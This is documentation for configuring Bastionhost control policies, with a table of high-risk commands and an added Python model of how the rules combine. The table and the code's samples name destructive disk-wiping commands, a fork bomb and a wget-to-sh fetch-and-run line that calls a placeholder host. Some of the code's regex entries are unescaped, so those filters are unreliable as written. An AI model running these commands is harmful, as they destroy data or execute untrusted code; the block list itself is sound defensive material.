Bastionhost supports control policies. You can configure command control, command approval, protocol control, and access control policies to control O&M operations. This prevents users from running high-risk commands or performing accidental operations, which ensures O&M security.
Step 1: Create a control policy
Log on to the console of a bastion host. For more information, see Log on to the console of a bastion host.
In the left-side navigation pane, click Control Policies.
On the Control Policies page, click Create Control Policy.
On the Create Control Policy page, configure the Name, Priority, Command Control, Command Approval, Protocol Control, Access Control, and O&M Approval parameters. Then, click Create Control Policy.
Parameter
Description
Name
Specify the name for the control policy. The name must meet the following requirements:
The name must be 1 to 128 characters in length.
The name cannot start with a special character.
The name can contain the following special characters: periods (.), underscores (_), hyphens (-), backslashes (\), and spaces.
Priority
Specify the priority of the control policy.
Valid values: 1 to 100. Default value: 1. The default value specifies the highest priority.
You can configure the same priority for different control policies. If multiple control policies have the same priority, the policy that is created at the most recent point in time takes precedence. If the same command is involved in both the command control and command approval rules in a control policy, the rules are prioritized in descending order: reject, allow, and approve.
Command Control
Note: This parameter applies only to Linux hosts.
Specify the commands that can or cannot be run by the users or on the assets to which the policy applies.
Command Control Type
(Blacklist) Listed Commands Are Not Allowed: If you select this option, you can leave the Commands field empty. The commands in a blacklist cannot be run by the users or on the assets to which the policy applies.
(Whitelist) Only Listed Commands Are Allowed: If you select this option, you must configure the Commands field. Only the commands in a whitelist can be run by the users and on the assets to which the policy applies.
Commands: For more information, see Recommended policies for commands.
Command Approval
Note: This parameter applies only to Linux hosts.
Specify the commands that can be run only after approval.
If users run the commands that are specified by the Commands field in the Command Approval step, you can choose whether to approve the execution of the commands in the console of the bastion host. Only the commands that are approved can be run. For more information, see Review commands.
A command approval policy is used to approve the commands that are not included in the whitelist or blacklist of a command control policy. The command control policy takes precedence over the command approval policy during validation.
Protocol Control
Configure the RDP Options, SSH Options, and SFTP Options fields.
After you select the required options, the users to whom the policy applies can perform only the operations that correspond to the selected options. For example, if you select File Upload, the users can upload files.
Important: You must select at least one of the SSH Channel and SFTP Channel options. If you clear SSH Channel, SSH-based logon is disabled for the affected accounts. Proceed with caution.
If you enable Enable Only SFTP Permission for a host account, do not disable both the SSH and SFTP channels for that host account in a control policy. Otherwise, the host account can no longer be used to access the host through the bastion host.
Access Control
Specify whether a source IP address can access the assets to which the policy applies.
(Whitelist) Only Listed IP Addresses Are Allowed: If you select this option, you must configure the IP Addresses field. Users can use only the source IP addresses in a whitelist to access the assets to which the policy applies.
(Blacklist) Listed IP Addresses Are Not Allowed: If you select this option, you can leave the IP Addresses field empty. Users cannot use the source IP addresses in a blacklist to access the assets to which the policy applies.
O&M Approval
After O&M Approval is enabled, an O&M engineer can log on to the required assets and perform O&M operations only after a Bastionhost administrator approves the O&M application. For more information, see Review an O&M application.
Step 2: Associate the control policy with assets and users
On the Assets and Users to Which Policy Is Attached page, you must associate the control policy with assets and users for the policy to take effect on the assets and users.
Associate the control policy with assets. You can select Takes Effect on All Assets or Takes Effect on Selected Assets.
If you select Takes Effect on All Assets, the control policy takes effect on all accounts of all assets.
If you select Takes Effect on Selected Assets, select the assets that you want to associate, and then select Associate All Accounts or Associate Specific Accounts.
Note: If you want to associate a control policy with multiple assets or asset accounts at a time, add the assets to an asset group first and then associate the control policy with the group.
Associate the control policy with users. You can select Apply to All Users or Apply to Selected Users.
Recommended policies for commands
The following table lists common high-risk commands, what each command does, and the recommended policy for each command. You can configure the parameters in the Command Control (Optional) and Command Approval (Optional) steps based on this table.
Command | Description | Recommended policy
reboot | Restarts the system. | This command must be approved before it can be run.
restart | Restarts the system. | This command must be approved before it can be run.
shutdown | Shuts down the system. | This command must be approved before it can be run.
halt | Shuts down the system. | This command must be approved before it can be run.
poweroff | Shuts down the system. | This command must be approved before it can be run.
init 0 | Stops the system. | This command must be approved before it can be run.
pkill | Terminates multiple processes at a time. | This command must be approved before it can be run.
kill | Terminates a single process. | This command must be approved before it can be run.
rm -rf | Recursively deletes directories and ignores prompts. | This command must be approved before it can be run.
mount | Mounts a file system. This may allow viruses to spread. | This command must be approved before it can be run.
umount | Unmounts a file system. | This command must be approved before it can be run.
parted | Partitions a file system. | This command must be approved before it can be run.
format | Formats the disk. | This command must be added to a blacklist.
dd if=/dev/zero of=/dev/hda | Clears the disk. | This command must be added to a blacklist.
:(){:|:&};: | Creates a fork bomb. | This command must be added to a blacklist.
(mv)(|.*)(/dev/null) | Moves a directory to /dev/null. | This command must be added to a blacklist.
(wget)(|.*)(-O- \| sh) | Downloads a file and immediately executes it. | This command must be added to a blacklist.
mkfs.ext3 * | Formats the disk. | This command must be added to a blacklist.
dd if=/dev/random of=/dev/* | Writes random data to a block device. | This command must be added to a blacklist.
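The following Python model is an added example, not Bastionhost's own code. It combines the rules described in the parameter table above (command control, command approval, the reject > allow > approve order, ranking by priority and creation time, and source IP access control) with the entries of this table, so the outcome for a concrete command and source address can be checked. It assumes that command entries are regular expressions searched anywhere in the command line, that the highest-ranked attached policy governs access control, that the highest-ranked policy with an opinion on a command decides it, and that a blacklist policy with no match stays silent. The dd entry's device name is read as hda, the approval entries are anchored with ^ and \b, and the extra rm -rf / entry, the two sample policies and the sample requests are constructed for the example.

```python
"""Added example (not Bastionhost's own code): a small model of how control
policy rules combine. Assumptions are stated in the comments below."""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Page rule: when one command matches several rules, reject > allow > approve.
VERDICT_RANK = {"reject": 0, "allow": 1, "approve": 2}

# Blacklist entries from the "Recommended policies for commands" table,
# used as regular expressions (assumption); the dd device name is read as hda.
TABLE_BLACKLIST = [
    r"format",
    r"dd if=/dev/zero of=/dev/hda",
    r":(){:|:&};:",
    r"(mv)(|.*)(/dev/null)",
    r"(wget)(|.*)(-O- \| sh)",
    r"mkfs.ext3 *",
    r"dd if=/dev/random of=/dev/*",
]
# Approval entries from the same table, anchored here (this example's choice)
# so that "kill" does not also match "pkill" or "killall".
TABLE_APPROVAL = [rf"^{c}\b" for c in (
    "reboot", "restart", "shutdown", "halt", "poweroff", "init 0",
    "pkill", "kill", "rm -rf", "mount", "umount", "parted")]


@dataclass
class ControlPolicy:
    name: str
    priority: int = 1                 # valid values 1..100; 1 is the highest
    created_at: int = 0               # creation order; larger = more recent
    command_mode: str = "blacklist"   # "blacklist" or "whitelist"
    commands: List[str] = field(default_factory=list)
    approval_commands: List[str] = field(default_factory=list)
    ip_mode: str = "blacklist"        # access control list type
    ip_addresses: List[str] = field(default_factory=list)  # IPs or CIDRs

    def source_allowed(self, source_ip: str) -> bool:
        """Access control: a whitelist admits only listed sources, a blacklist refuses them."""
        ip = ipaddress.ip_address(source_ip)
        listed = any(ip in ipaddress.ip_network(e, strict=False) for e in self.ip_addresses)
        return listed if self.ip_mode == "whitelist" else not listed

    def command_verdict(self, command: str) -> Optional[str]:
        """'reject', 'allow' or 'approve' from this policy alone; None if it is silent."""
        verdicts = []
        in_control_list = any(re.search(p, command) for p in self.commands)
        if self.command_mode == "whitelist":
            verdicts.append("allow" if in_control_list else "reject")
        elif in_control_list:
            verdicts.append("reject")
        if any(re.search(p, command) for p in self.approval_commands):
            verdicts.append("approve")
        # Command control outranks approval: keep the strongest verdict present.
        return min(verdicts, key=VERDICT_RANK.get) if verdicts else None


def rank(policies: List[ControlPolicy]) -> List[ControlPolicy]:
    """Lower priority number first; among equals, the most recently created first."""
    return sorted(policies, key=lambda p: (p.priority, -p.created_at))


def evaluate(policies: List[ControlPolicy], source_ip: str, command: str) -> str:
    """Outcome for one O&M request: 'reject', 'approve' (needs review) or 'allow'."""
    ranked = rank(policies)
    if ranked and not ranked[0].source_allowed(source_ip):
        return "reject"  # session refused by access control, command never reaches the host
    for policy in ranked:
        verdict = policy.command_verdict(command)
        if verdict is not None:
            return verdict
    return "allow"


# Constructed sample policies (not from the page).
BASELINE = ControlPolicy(
    "baseline", priority=10, created_at=1, command_mode="blacklist",
    commands=TABLE_BLACKLIST + [r"^rm -rf /(\s|$)"],  # constructed extra entry
    approval_commands=TABLE_APPROVAL,
    ip_mode="blacklist", ip_addresses=["203.0.113.0/24"],
)
DBA_WINDOW = ControlPolicy(
    "dba-window", priority=1, created_at=2, command_mode="whitelist",
    commands=[r"^mysqldump\b", r"^systemctl (status|restart) mysql$"],
    ip_mode="whitelist", ip_addresses=["10.0.0.0/8"],
)

if __name__ == "__main__":
    for ip, cmd in [("10.0.0.5", "ls -la"), ("10.0.0.5", "reboot"),
                    ("10.0.0.5", "rm -rf /tmp/build"), ("10.0.0.5", "rm -rf /"),
                    ("10.0.0.5", "wget http://host.invalid/x -O- | sh"),
                    ("203.0.113.9", "ls")]:
        print(f"{ip:14} {cmd:40} -> {evaluate([BASELINE], ip, cmd)}")
    print("with dba-window attached:", evaluate([BASELINE, DBA_WINDOW], "10.0.0.5", "reboot"))
```

Run the file to print the verdict for each sample request. Two things the model makes visible: a command that appears in both a blacklist and an approval list is rejected outright rather than sent for review, because reject outranks approve; and bare entries such as kill or format are matched as substrings, so without anchors they also hit pkill, killall or ls --format, which is why the approval entries are anchored in this example.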